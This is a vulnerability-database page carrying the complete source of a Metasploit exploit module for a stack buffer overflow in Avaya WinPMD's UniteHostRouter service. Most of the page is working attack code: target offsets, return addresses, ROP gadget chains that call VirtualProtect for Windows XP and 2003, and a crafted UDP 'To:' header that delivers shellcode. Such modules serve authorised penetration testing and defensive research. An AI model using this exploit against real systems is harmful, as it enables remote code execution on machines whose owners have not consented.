Lucene search
K

Avaya WinPMD UniteHostRouter Buffer Overflow

🗓️ 07 Oct 2012 10:05:13Reported by AbdulAziz Hariri, Unknown, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 35 Views

Avaya WinPMD UniteHostRouter Buffer Overflow, vulnerable to stack buffer overflow allowing remote code execution

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Avaya WinPMD UniteHostRouter Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability
        exists in the UniteHostRouter service, due to the insecure usage of memcpy when
        parsing specially crafted "To:" headers. The module has been tested successfully on
        Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.
      },
      'Author'         =>
        [
          'AbdulAziz Hariri', # Vulnerability discovery
          'Unknown',          # Abysssec, PoC
          'juan vazquez'      # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '82764'],
          ['OSVDB', '73269'],
          ['BID', '47947'],
          ['EDB', '18397'],
          ['URL', 'https://downloads.avaya.com/css/P8/documents/100140122'],
          ['URL', 'http://web.archive.org/web/20110527165515/http://secunia.com:80/advisories/44062']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0d\x0a\x20\x2f\x3a\x3f",
          'Space' => 1024,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Avaya WinPMD 3.8.2 / Windows XP SP3',
            {
              'Offset' => 260,
              'Ret' => 0x77c2e93b # MOV EAX,EDI # POP EDI # RETN from msvcrt
            }
          ],
          ['Avaya WinPMD 3.8.2 / Windows 2003 SP2',
            {
              'Offset' => 260,
              'Ret' => 0x0040e0f2 # ADD ESP,44 # POP ESI # ADD ESP,0C8 # RETN from UniteHostRouter.EXE
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2011-05-23',
      'DefaultTarget'  => 0
      ))

    register_options([ Opt::RPORT(3217) ])
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V")[0].to_i
  end

  def nop
    return make_nops(4).unpack("V")[0].to_i
  end

  def exploit
    connect_udp

    if target.name =~ /Windows XP SP3/
      buf = "\xeb\x7f" # jmp short $+0x81
      buf << rand_text(0x81 - 2)
      buf << "\xeb\x7f" # jmp short $+0x81
      buf << rand_text(0x81 - 2)
      buf << "\xeb\x64" # jmp short $+0x66 # jmp to shellcode in the heap
      buf << [target.ret].pack("V") # MOV EAX,EDI # POP EDI # RETN # from msvcrt # EDI points to data in the heap
      buf << [0x77c5f9a0].pack("V") # Readable address with string # from msvcrt
      buf << ([0x77c3c99c].pack("V")) * 21 # (INC EAX # RETN) * 21 # from msvcrt # EAX points to data in th heap, align to shellcode position
      buf << [0x77c168cd].pack("V") # jmp eax # from msvcrt.dll # JMP to shellcode in the heap
    elsif target.name =~ /Windows 2003 SP2/
      rop_gadgets =
        [
          0x77bb2563, # POP EAX # RETN
          0x77ba1114, # <- *&VirtualProtect()
          0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
          junk,
          0x77bb0c86, # XCHG EAX,ESI # RETN
          0x77bc9801, # POP EBP # RETN
          0x77be2265, # ptr to 'push esp #  ret'
          0x77bb2563, # POP EAX # RETN
          0x03C0990F,
          0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
          0x77bb48d3, # POP EBX, RET
          0x77bf21e0, # .data
          0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
          0x77bbfc02, # POP ECX # RETN
          0x77bef001, # W pointer (lpOldProtect) (-> ecx)
          0x77bd8c04, # POP EDI # RETN
          0x77bd8c05, # ROP NOP (-> edi)
          0x77bb2563, # POP EAX # RETN
          0x03c0984f,
          0x77bdd441, # SUB EAX, 03c0940f
          0x77bb8285, # XCHG EAX,EDX # RETN
          0x77bb2563, # POP EAX # RETN
          nop,
          0x77be6591, # PUSHAD # ADD AL,0EF # RETN
        ].pack("V*")
      buf = rand_text(3) # padding
      buf << rop_gadgets
      buf << "\xeb\x7f" # jmp $+0x81
      buf << rand_text(0x81-2)
      buf << "\xeb\x25" # jmp short $+0x66 => to shellcode
      buf << rand_text(target['Offset'] - buf.length)
      buf << "\xf2\xe0\x40" # EIP => # ADD ESP,44 # POP ESI # ADD ESP,0C8 # RETN from [UniteHostRouter.EXE # stackpivot to heap
    end

    request = "UTP/1 To: 127.0.0.1 /#{buf}\r\n\r\n"

    if target.name =~ /Windows 2003 SP2/
      request << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
    end

    request << payload.encoded # The shellcode will be stored in the heap

    print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
    udp_sock.put(request)
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation